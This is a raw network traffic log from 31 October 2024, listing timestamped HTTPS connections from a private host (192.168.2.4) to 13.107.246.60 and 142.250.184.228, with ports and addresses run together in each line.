                                                  Oct 31, 2024 20:50:53.501435041 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.501445055 CET52425443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.501450062 CET4435242513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.503678083 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.503717899 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.503768921 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.503810883 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.503921032 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.504174948 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.504174948 CET52426443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.504193068 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.504200935 CET4435242613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.504632950 CET52430443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.504664898 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.504730940 CET52430443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.505136967 CET52430443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.505148888 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.506771088 CET52431443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.506860971 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.506939888 CET52431443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.507096052 CET52431443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.507139921 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.578299046 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.578353882 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.578413010 CET52427443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.578558922 CET52427443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.578558922 CET52427443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.578569889 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.578577042 CET4435242713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.580605030 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.580624104 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.580779076 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.580920935 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.580934048 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.834656954 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:53.834722042 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:53.834769964 CET52374443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:50:53.885412931 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.885869026 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.885885954 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.886343002 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.886352062 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.927851915 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.928236961 CET52429443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.928267956 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:53.928643942 CET52429443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:53.928651094 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.036259890 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.036286116 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.036324024 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.036329031 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.036375999 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.036631107 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.036631107 CET52428443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.036649942 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.036659002 CET4435242813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.039428949 CET52433443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.039467096 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.039625883 CET52433443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.039792061 CET52433443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.039804935 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.064251900 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.064980984 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.065038919 CET52429443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.065082073 CET52429443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.065103054 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.065116882 CET52429443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.065124989 CET4435242913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.067234993 CET52434443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.067266941 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.067553043 CET52434443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.067688942 CET52434443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.067702055 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.296858072 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.297450066 CET52431443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.297487020 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.297894001 CET52431443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.297909021 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.299928904 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.300450087 CET52430443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.300463915 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.301101923 CET52430443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.301106930 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.353228092 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.353606939 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.353621960 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.354078054 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.354084015 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.433222055 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.433273077 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.433327913 CET52431443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.433489084 CET52431443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.433520079 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.433545113 CET52431443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.433561087 CET4435243113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.435559988 CET52435443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.435589075 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.435668945 CET52435443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.435832977 CET52435443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.435843945 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.436008930 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.436069012 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.436167955 CET52430443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.436219931 CET52430443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.436219931 CET52430443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.436245918 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.436254025 CET4435243013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.438052893 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.438101053 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.438174963 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.438342094 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.438369989 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.488512039 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.488575935 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.488682032 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.488688946 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.488755941 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.488826990 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.488840103 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.488848925 CET52432443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.488853931 CET4435243213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.490854979 CET52437443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.490875006 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.490981102 CET52437443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.491128922 CET52437443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.491138935 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.709817886 CET52374443192.168.2.4142.250.184.228
                                                  Oct 31, 2024 20:50:54.709850073 CET44352374142.250.184.228192.168.2.4
                                                  Oct 31, 2024 20:50:54.779834032 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.780303001 CET52433443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.780320883 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.780747890 CET52433443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.780756950 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.843331099 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.843791008 CET52434443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.843815088 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.844273090 CET52434443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.844278097 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.913755894 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.913831949 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.913933992 CET52433443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.914088011 CET52433443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.914107084 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.914128065 CET52433443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.914134026 CET4435243313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.917243958 CET52438443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.917337894 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.917423010 CET52438443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.917551041 CET52438443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.917584896 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.978027105 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.978332996 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.978410959 CET52434443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.978457928 CET52434443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.978457928 CET52434443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.978476048 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.978482962 CET4435243413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.980870962 CET52439443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.980906010 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:54.980997086 CET52439443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.981136084 CET52439443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:54.981148958 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.180857897 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.181325912 CET52435443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.181340933 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.181807041 CET52435443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.181812048 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.215840101 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.216202021 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.216233015 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.216563940 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.216578007 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.259085894 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.259500980 CET52437443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.259510994 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.259861946 CET52437443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.259866953 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.321679115 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.321736097 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.321794033 CET52435443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.321945906 CET52435443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.321963072 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.321974993 CET52435443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.321980000 CET4435243513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.324695110 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.324737072 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.324829102 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.325011969 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.325031996 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.355094910 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.355120897 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.355156898 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.355179071 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.355228901 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.355407000 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.355448961 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.355480909 CET52436443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.355496883 CET4435243613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.358098984 CET52441443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.358129025 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.358189106 CET52441443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.358335018 CET52441443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.358349085 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.576334000 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.576422930 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.576489925 CET52437443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.576689005 CET52437443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.576710939 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.576725006 CET52437443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.576730013 CET4435243713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.579435110 CET52442443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.579461098 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.579572916 CET52442443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.579718113 CET52442443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.579735994 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.654200077 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.654586077 CET52438443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.654645920 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.655061960 CET52438443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.655092001 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.747634888 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.748106956 CET52439443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.748121977 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.748564959 CET52439443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.748572111 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.785303116 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.785350084 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.785518885 CET52438443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.785614014 CET52438443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.785614014 CET52438443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.785630941 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.785641909 CET4435243813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.788234949 CET52443443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.788261890 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.788364887 CET52443443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.788563013 CET52443443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.788578033 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.883416891 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.883491993 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.883723021 CET52439443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.883809090 CET52439443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.883809090 CET52439443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.883829117 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.883836985 CET4435243913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.886503935 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.886533022 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:55.886655092 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.886828899 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:55.886842966 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.058806896 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.059343100 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.059375048 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.059802055 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.059808969 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.095217943 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.095633030 CET52441443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.095649958 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.096102953 CET52441443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.096107006 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.188086033 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.188138008 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.188183069 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.188225031 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.188252926 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.188442945 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.188462973 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.188476086 CET52440443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.188483000 CET4435244013.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.191145897 CET52445443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.191190004 CET4435244513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.191354036 CET52445443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.191473007 CET52445443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.191485882 CET4435244513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.226336002 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.226397991 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.226515055 CET52441443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.226543903 CET52441443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.226557016 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.226568937 CET52441443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.226572990 CET4435244113.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.228863001 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.228892088 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.228951931 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.229106903 CET52446443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.229119062 CET4435244613.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.344136953 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.344614983 CET52442443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.344638109 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.345149994 CET52442443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.345156908 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.478777885 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.478833914 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.478903055 CET52442443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.479163885 CET52442443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.479203939 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.479232073 CET52442443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.479247093 CET4435244213.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.481992960 CET52447443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.482040882 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.482194901 CET52447443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.482424974 CET52447443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.482444048 CET4435244713.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.534486055 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.535005093 CET52443443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.535017967 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.535450935 CET52443443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.535455942 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.667975903 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.668026924 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.668226004 CET52443443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.668298006 CET52443443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.668298006 CET52443443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.668308973 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.668317080 CET4435244313.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.671098948 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.671125889 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.671205044 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.671396017 CET52448443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.671407938 CET4435244813.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.673624992 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.674017906 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.674032927 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.674562931 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.674566984 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.808834076 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.808865070 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.808909893 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.808948040 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.809010983 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.809190989 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.809190989 CET52444443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.809210062 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.809220076 CET4435244413.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.811892033 CET52449443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.811934948 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.812037945 CET52449443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.812175989 CET52449443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.812191010 CET4435244913.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.931276083 CET4435244513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.932131052 CET52445443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.932131052 CET52445443192.168.2.413.107.246.60
                                                  Oct 31, 2024 20:50:56.932157040 CET4435244513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.932173014 CET4435244513.107.246.60192.168.2.4
                                                  Oct 31, 2024 20:50:56.995208025 CET4435244613.107.246.60192.168.2.4
